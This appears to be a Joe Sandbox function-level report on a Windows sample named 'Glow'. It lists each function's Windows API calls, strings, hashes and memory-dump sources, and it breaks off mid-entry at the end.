Opcode ID: 43180bc783722a44af5ded62e59f6bbeffb4566001ac15eab5a6ec20d92766ed
Instruction ID: 3a85c30314738f916efe468d40d2edf5c346441644c568ba8d25c360436e8152
Opcode Fuzzy Hash: 43180bc783722a44af5ded62e59f6bbeffb4566001ac15eab5a6ec20d92766ed
Instruction Fuzzy Hash: 74116A71A01119AFCF15EFA4C9859EE77B8EB05340F004496E902E7141C774BA82CBA5

Function 003A50DD Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,003A508E,?,?,003A502E,?,004498D8,0000000C,003A5185,?,00000002), ref: 003A50FD
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 003A5110
FreeLibrary.KERNEL32(00000000,?,?,?,003A508E,?,?,003A502E,?,004498D8,0000000C,003A5185,?,00000002,00000000), ref: 003A5133

Strings

CorExitProcess, xrefs: 003A5108
mscoree.dll, xrefs: 003A50F6

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: b2e0af2ea4a2562402d5d80ce30840353b102c66d2dce64888bc86217900127a
Instruction ID: 34ff62d7a4d90f4381c2a5b3ecfa8b363638d2024fc12bd0e495d3bf0fd555e9
Opcode Fuzzy Hash: b2e0af2ea4a2562402d5d80ce30840353b102c66d2dce64888bc86217900127a
Instruction Fuzzy Hash: D0F0C274E00218BBDB159F94DC09BEDBFB4EF48712F004075F809A2160DB349E40CB98

Function 0038663E Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,?,0038668B,?,?,003862FA,?,00000001,?,?,00000000), ref: 0038664A
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 0038665C
FreeLibrary.KERNEL32(00000000,?,?,0038668B,?,?,003862FA,?,00000001,?,?,00000000), ref: 0038666E

Strings

kernel32.dll, xrefs: 00386642
Wow64DisableWow64FsRedirection, xrefs: 00386656

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 145871493-3689287502
Opcode ID: de42d3c942450b7b1b72b878ca6889bfcd8be5bc5f0d62dab73d245e9d4d7489
Instruction ID: 364c172eb914b580b85ce80719f34bddf815a63a3a29b1b6eff4489857b3e562
Opcode Fuzzy Hash: de42d3c942450b7b1b72b878ca6889bfcd8be5bc5f0d62dab73d245e9d4d7489
Instruction Fuzzy Hash: FCE08675A016226792122725AC09B9A65289F82B22B064265FD04D2108EB68CC0181EC

Function 00386607 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,?,003C5657,?,?,003862FA,?,00000001,?,?,00000000), ref: 00386610
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00386622
FreeLibrary.KERNEL32(00000000,?,?,003C5657,?,?,003862FA,?,00000001,?,?,00000000), ref: 00386635

Strings

kernel32.dll, xrefs: 00386609
Wow64RevertWow64FsRedirection, xrefs: 0038661C

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 145871493-1355242751
Opcode ID: 23686f5f0dc5bfe22df6190875339753ba2a08e8b9047cbf45698ab18e947e85
Instruction ID: 30e20882141af0010edb9bb1b0d7d3caf86737a60057d03d9ded7c61a571c858
Opcode Fuzzy Hash: 23686f5f0dc5bfe22df6190875339753ba2a08e8b9047cbf45698ab18e947e85
Instruction Fuzzy Hash: 56D0C231A0267177422337206D09BCF2A159ED1B1130A4061B804A2118EF28CC0182DC

Function 003F3306 Relevance: 7.8, APIs: 5, Instructions: 313fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 003F35C4
DeleteFileW.KERNEL32(?), ref: 003F3646
CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 003F365C
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 003F366D
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 003F367F

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: File$Delete$Copy
String ID:
API String ID: 3226157194-0
Opcode ID: 05f8f0cc73b79bb23398fcea95e3d349c0acf40b35a4845558a1e42eda6831a7
Instruction ID: 072c453d01a8f09d4649df68e0349bccd672b3ed7e010b2b8783f6c11da4b6ca
Opcode Fuzzy Hash: 05f8f0cc73b79bb23398fcea95e3d349c0acf40b35a4845558a1e42eda6831a7
Instruction Fuzzy Hash: F1B13271D0121DABDF16EBA4CC85EEEB77DEF49314F0040A6F609EA151EB349B448B61

Function 0040ADE7 Relevance: 7.8, APIs: 5, Instructions: 256COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 0040AE87
OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0040AE95
GetProcessIoCounters.KERNEL32(00000000,?), ref: 0040AEC8
CloseHandle.KERNEL32(?), ref: 0040B09D

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: Process$CloseCountersCurrentHandleOpen
String ID:
API String ID: 3488606520-0
Opcode ID: 8d318178a1b533d9eab9a802e66539bd49c3ab581b3adccd9cb5b65d54fe4a97
Instruction ID: 542cf8908a1dac9ff035d9a829038ffeaa55c773a8d6cc00c396c3661627a5e8
Opcode Fuzzy Hash: 8d318178a1b533d9eab9a802e66539bd49c3ab581b3adccd9cb5b65d54fe4a97
Instruction Fuzzy Hash: 77A1B171A00301AFE721EF24C886B2AB7E5AF44710F54886DF5599B3D2D775EC41CB86

Function 0040C429 Relevance: 7.7, APIs: 5, Instructions: 167registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0038B329: _wcslen.LIBCMT ref: 0038B333

Part of subcall function 0040D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0040C10E,?,?), ref: 0040D415
Part of subcall function 0040D3F8: _wcslen.LIBCMT ref: 0040D451
Part of subcall function 0040D3F8: _wcslen.LIBCMT ref: 0040D4C8
Part of subcall function 0040D3F8: _wcslen.LIBCMT ref: 0040D4FE

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0040C505
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0040C560
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 0040C5C3
RegCloseKey.ADVAPI32(?,?), ref: 0040C606
RegCloseKey.ADVAPI32(00000000), ref: 0040C613

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
String ID:
API String ID: 826366716-0
Opcode ID: 77503109a618e388db9bceb6ccec267e9639bcad4ad87c5b7675102a2049590a
Instruction ID: fd258e31dc699d7d3224a4efda63329eaeb7bd95ade6ba9e6f580e4d2b16ad6b
Opcode Fuzzy Hash: 77503109a618e388db9bceb6ccec267e9639bcad4ad87c5b7675102a2049590a
Instruction Fuzzy Hash: 2661A075108241EFC314DF14C890E6ABBE5FF84308F5489ADF4969B292CB35ED46CB96

Function 003EED12 Relevance: 7.7, APIs: 5, Instructions: 167filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 003EE6F7: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,003ED7CD,?), ref: 003EE714

Part of subcall function 003EE6F7: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,003ED7CD,?), ref: 003EE72D

Part of subcall function 003EEAB0: GetFileAttributesW.KERNEL32(?,003ED840), ref: 003EEAB1

lstrcmpiW.KERNEL32(?,?), ref: 003EED8A
MoveFileW.KERNEL32(?,?), ref: 003EEDC3
_wcslen.LIBCMT ref: 003EEF02
_wcslen.LIBCMT ref: 003EEF1A
SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 003EEF67

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
String ID:
API String ID: 3183298772-0
Opcode ID: 624fdeff5df959454840fd55420a7cb97836ca52c94114640416b5f030191ed8
Instruction ID: d49a06b0977cfd808e799a084d344d8f2f5515080bc2837c9c128c23db9acb79
Opcode Fuzzy Hash: 624fdeff5df959454840fd55420a7cb97836ca52c94114640416b5f030191ed8
Instruction Fuzzy Hash: 485174B24083959FC726EB91CC819DBB3ECEF85310F004A2EF285D7191EF71A6888756

Function 003E9517 Relevance: 7.7, APIs: 5, Instructions: 159COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 003E9534
VariantClear.OLEAUT32 ref: 003E95A5
VariantClear.OLEAUT32 ref: 003E9604
VariantClear.OLEAUT32(?), ref: 003E9677
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 003E96A2

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType
String ID:
API String ID: 4136290138-0
Opcode ID: e473214e2b91ece6470f2dd46175811ac831526697d37b8720edb9fce51021e3
Instruction ID: e629a4c57b75e2fecf51d56e110a7fdea97620871cf5c204b1f8dd49c2d04243
Opcode Fuzzy Hash: e473214e2b91ece6470f2dd46175811ac831526697d37b8720edb9fce51021e3
Instruction Fuzzy Hash: CE514AB5A00259EFCB15CF59C884EAAB7F8FF89314B15856AE905DB350E730E911CF90

Function 003F9540 Relevance: 7.6, APIs: 5, Instructions: 143COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 003F95F3
GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 003F961F
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 003F9677
WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 003F969C
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 003F96A4

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String
String ID:
API String ID: 2832842796-0
Opcode ID: 6bdc5bab13d749c14c746c485aaa13909c59a238dbfa548715e07bc98bfd9820
Instruction ID: 121b5dead2093d8ec1249e6718f4f73473b3916b8a0582fac90706f3c074fa76
Opcode Fuzzy Hash: 6bdc5bab13d749c14c746c485aaa13909c59a238dbfa548715e07bc98bfd9820
Instruction Fuzzy Hash: F8512F75A002199FCB06EF65C881AA9BBF5FF49314F058099E949AF362CB35ED41CF90

Function 00409941 Relevance: 7.6, APIs: 5, Instructions: 143libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(?,00000000,?), ref: 0040999D
GetProcAddress.KERNEL32(00000000,?), ref: 00409A2D
GetProcAddress.KERNEL32(00000000,00000000), ref: 00409A49
GetProcAddress.KERNEL32(00000000,?), ref: 00409A8F
FreeLibrary.KERNEL32(00000000), ref: 00409AAF

Part of subcall function 0039F9D4: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,003F1A02,?,753CE610), ref: 0039F9F1
Part of subcall function 0039F9D4: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,003E0354,00000000,00000000,?,?,003F1A02,?,753CE610,?,003E0354), ref: 0039FA18

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
String ID:
API String ID: 666041331-0
Opcode ID: 611c1f9c89ec169824c9c1a04801f0837de3a2c92cf672a2a29002127c3a0d9a
Instruction ID: be366ffca550e40da46bcd1e47e7b0988ba6691c1341f9c681b7d32b0454329b
Opcode Fuzzy Hash: 611c1f9c89ec169824c9c1a04801f0837de3a2c92cf672a2a29002127c3a0d9a
Instruction Fuzzy Hash: B3515C75A00245DFCB01EF68C48499ABBF0FF09314B1581A9E80AAF762D735ED86CF95

Function 004175AE Relevance: 7.6, APIs: 5, Instructions: 131windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(00000002,000000F0,?), ref: 0041766B
SetWindowLongW.USER32(?,000000EC,?), ref: 00417682
SendMessageW.USER32(00000002,00001036,00000000,?), ref: 004176AB
ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,003FB5BE,00000000,00000000), ref: 004176D0
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 004176FF

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: Window$Long$MessageSendShow
String ID:
API String ID: 3688381893-0
Opcode ID: 8cb545cf00243c939a2a9b725dc4aedc5cd84ae62faa84acc78e4d7cef573142
Instruction ID: cd4b702945b24a3bf64004857bc374b003c6c98b6dc11460a5846365d6986ae9
Opcode Fuzzy Hash: 8cb545cf00243c939a2a9b725dc4aedc5cd84ae62faa84acc78e4d7cef573142
Instruction Fuzzy Hash: 2041C275A08604AFD7259F2CCC48FE67B75EB09360F150266F819A73E0C778AD81D658

Function 003B23C1 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 003B2433
_free.LIBCMT ref: 003B2453

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 7537bbe4e368d568ab32f35f479f9e27fcf3a61c46db4d016460cb421f994e28
Instruction ID: 4e6045390856cef1303ffd3f587e9edb33c2f0c0c8764943266b831e8de39c36
Opcode Fuzzy Hash: 7537bbe4e368d568ab32f35f479f9e27fcf3a61c46db4d016460cb421f994e28
Instruction Fuzzy Hash: FF41D636E002009FCB25DF79C881A9EB7E5EF89318F1546A8E615EB755D731AD01CB80

Function 003E224E Relevance: 7.6, APIs: 5, Instructions: 93sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 003E2262
PostMessageW.USER32(00000001,00000201,00000001), ref: 003E230E
Sleep.KERNEL32(00000000,?,?,?), ref: 003E2316
PostMessageW.USER32(00000001,00000202,00000000), ref: 003E2327
Sleep.KERNEL32(00000000,?,?,?,?), ref: 003E232F

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: 771ef5ab5dc335fdcdd397245b26d06e018c897fca979c13549f3876db5e8246
Instruction ID: 3d605055a99b36b9343d0e01f61dec3f5a24ddd3e922e46d677ff1081c204d98
Opcode Fuzzy Hash: 771ef5ab5dc335fdcdd397245b26d06e018c897fca979c13549f3876db5e8246
Instruction Fuzzy Hash: FB31B171900269EFDB15CFA8CD89BDE3BB9EB04315F104725FA25AB2D0C770A944DB90

Function 003FD95F Relevance: 7.6, APIs: 5, Instructions: 93networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,003FCC63,00000000), ref: 003FD97D
InternetReadFile.WININET(?,00000000,?,?), ref: 003FD9B4
GetLastError.KERNEL32(?,00000000,?,?,?,003FCC63,00000000), ref: 003FD9F9
SetEvent.KERNEL32(?,?,00000000,?,?,?,003FCC63,00000000), ref: 003FDA0D
SetEvent.KERNEL32(?,?,00000000,?,?,?,003FCC63,00000000), ref: 003FDA37

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: EventInternet$AvailableDataErrorFileLastQueryRead
String ID:
API String ID: 3191363074-0
Opcode ID: 3aa656923be2ca137527d7956d5132a6249d8fab1009043c80e8c82c763f16e7
Instruction ID: e9c58fa3bd0f2507c20484419d42ea2b3dffd5c8a90e2d86cbc4cc20e7c9a0d8
Opcode Fuzzy Hash: 3aa656923be2ca137527d7956d5132a6249d8fab1009043c80e8c82c763f16e7
Instruction Fuzzy Hash: D6317AB1904209EFDB26DFA5D888EBBBBF9EB00350B10842EE646D7140D770EE409B64

Function 004161A5 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001053,000000FF,?), ref: 004161E4
SendMessageW.USER32(?,00001074,?,00000001), ref: 0041623C
_wcslen.LIBCMT ref: 0041624E
_wcslen.LIBCMT ref: 00416259
SendMessageW.USER32(?,00001002,00000000,?), ref: 004162B5

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: MessageSend$_wcslen
String ID:
API String ID: 763830540-0
Opcode ID: b67596a588f4672903a0ecf1026bb1f5f1586d06f2b0271b35d695ac52e4eb40
Instruction ID: 83b89316c86e9b3d6096ea0a8d8b7772ad5f9298d7016d9a4a823d5dc32542b1
Opcode Fuzzy Hash: b67596a588f4672903a0ecf1026bb1f5f1586d06f2b0271b35d695ac52e4eb40
Instruction Fuzzy Hash: AE217171900218AADB119FA4CC84AEE77B9FB45324F108257F925EA280D778D9C6CF59

Function 0040138D Relevance: 7.6, APIs: 5, Instructions: 69COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 004013AE
GetForegroundWindow.USER32 ref: 004013C5
GetDC.USER32(00000000), ref: 00401401
GetPixel.GDI32(00000000,?,00000003), ref: 0040140D
ReleaseDC.USER32(00000000,00000003), ref: 00401445

Memory Dump Source

Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true

Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_380000_Glow.jbxd

Similarity

API ID: Window$ForegroundPixelRelease
String ID:
API String ID: 4156661090-0
Opcode ID: 09ca2c7e3cf1f86247dc523b05b7a19773e12b4e32cd623350cf0731067bd52f
Instruction ID: cb3cb8832f2d28c4a2725fc35e17f89222d63f3dc47927b801ca90d96c8cfe56
Opcode Fuzzy Hash: 09ca2c7e3cf1f86247dc523b05b7a19773e12b4e32cd623350cf0731067bd52f
Instruction Fuzzy Hash: 7E219076A00214AFD704EF65CC94AAEB7F9EF48340B048479F85ADB761CB30AC00CB94

Function 003BD13D Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 003BD146
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 003BD169

